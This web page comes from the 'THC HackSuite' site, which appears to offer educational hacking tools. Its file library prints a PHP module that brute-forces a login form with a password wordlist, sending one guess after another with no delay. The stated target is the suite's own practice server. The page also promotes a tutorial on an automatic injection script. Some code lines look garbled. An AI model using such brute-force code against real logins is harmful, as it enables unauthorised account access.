random gallery image
random tutorial
preview

..cool, we will make a new module and not just some new module, nope let's make a fully automatic injection script! This tutorial is the first step into making this. Let's first..

read more

random generators
THC xMap

Creates a blueprint/map of a server folder

more about this module
more of this category
more modules

HackSuite File Library
File Library
Here you can find the latest files and structure of the THC HackSuite, note that if you have an earlier version of the suite it's not recommended to update files manually. Instead you should overwrite your existing HackSuite environment.
<?php
/*
Bruteforce the TestServer

Author: Remco Kouw
Site: http://www.hacksuite.com
Last Edit: 12-11-2014
*/
if(!defined('IN_SCRIPT')){
    exit;
}
// properties for this callback
$_CBACKD = array("Attack THC_HS Login","callbackbf.php");
// we still want the callback to work when the username or the success message changes
$aAttackVars file($_PATHS['config_root']."/login_single_user.php");
$aAttackVarsU explode("|",$aAttackVars[4]);
$aAttackVarsS explode("|",$aAttackVars[8]);
$aGlobalConfig = array();
$aGlobalConfig['user'] = trim($aAttackVarsU[1]);
$aGlobalConfig['success'] = trim($aAttackVarsS[1]);
/* variable properties */
// visibility: [0] => hidden, [1] => visible, [2] => don't do anything
$_CBACKV = array();
$_CBACKV[0] = array();
$_CBACKV[0]['value'] = @str_replace("Modules/thc_ss/","",$_PATHS['servers_root_http'])."/login_single_user.php";
$_CBACKV[0]['row'] = "a1";
$_CBACKV[0]['fieldclass'] = "a1f";
$_CBACKV[0]['visibility'] = 0;
$_CBACKV[1] = array();
// set to zero, bcoz we wanna be as fast as possible when bruteforcing
$_CBACKV[1]['value'] = "0";
$_CBACKV[1]['row'] = "a2";
$_CBACKV[1]['fieldclass'] = "a2f";
$_CBACKV[1]['visibility'] = 0;
$_CBACKV[2] = array();
$_CBACKV[2]['value'] = $aGlobalConfig['success'];
$_CBACKV[2]['fieldclass'] = "a5f";
$_CBACKV[2]['row'] = "a4";
$_CBACKV[2]['visibility'] = 0;
$_CBACKV[3] = array();
$_CBACKV[3]['value'] = "post";
$_CBACKV[3]['row'] = "a5";
$_CBACKV[3]['fieldclass'] = "a6f";
$_CBACKV[3]['visibility'] = 0;
$_CBACKV[4] = array();
$_CBACKV[4]['value'] = 1;
$_CBACKV[4]['row'] = "a6";
$_CBACKV[4]['fieldclass'] = "scanf";
$_CBACKV[4]['visibility'] = 2;
$_CBACKV[5] = array();
// empty won't set any value
$_CBACKV[5]['value'] = "";
$_CBACKV[5]['row'] = "callbackfunction";
$_CBACKV[5]['fieldclass'] = "callbackfunctionf";
$_CBACKV[5]['visibility'] = 1;
if(!isset(
$_GETCBACK)){
    
/* Script that brute forces the testserver of the hacksuite
    
    Callbck must always produce a query string, which will be passed back to the SScan module so it can be attached to the query string.
    NOTE 1: this function uses global variables in order to construct the string which will be added to the query.
    NOTE 2: settings from the thc_ss scan will automatically be adjusted to thc_hs' html login
    NOTE 3: don't rewrite this function, instead make a new one with the same name
    
    PARAMETERS:
    NONE
    
    RETURNS:
    STRING: query string OR break key word BREAK
    */
    
if(!function_exists("Callbck")){
        function 
Callbck(){
            global 
$iOffsetKeyword;
            global 
$aListWord;
            global 
$aGlobalConfig;
            if(!isset(
$aListWord[$iOffsetKeyword])){
                
// break script
                
return("BREAK");
            }
            
$sString "user=".$aGlobalConfig['user']."&pass=".trim($aListWord[$iOffsetKeyword]);
            
$iOffsetKeyword++;
            return(
$sString);
        }
    }
    
// load thc wordlist
    
if(false===($aListWord = @file($_PATHS['wordlists_root']."/pw_a.txt"))){
        die(
$sOut."You need the wordlist associated with the login_single_user.php server.".$sEnd);
    }
    
$iOffsetKeyword 0;
    
// dissect the target
    
$aUrl = @parse_url($_CBACKV[0]['value']);
    
// set loops variable
    
$iLoops count($aListWord);
    
// make a copy of the old query
    
$aUrl['queryold'] = (isset($aUrl['query']) && $aUrl['query']!="" $aUrl['queryold'] : "");
}
?>
powered by
site stats
cms statistics:
version: 0.6.0
downloads: 3836
native: 26
modules: 21
apps: 2
support development
It takes lots of calories in order to create new things for the hacksuite, so it would be grand if you could buy me a protein shake or extra energy to keep me going. Thanks!
disclaimer
We are not responsible for any direct or indirect damage caused by abusing the tools provided on hacksuite.com. The suite is developed for educational purposes, use at your own risk!
Created by Remco Kouw. Powered by protein shakes and a high calorie diet.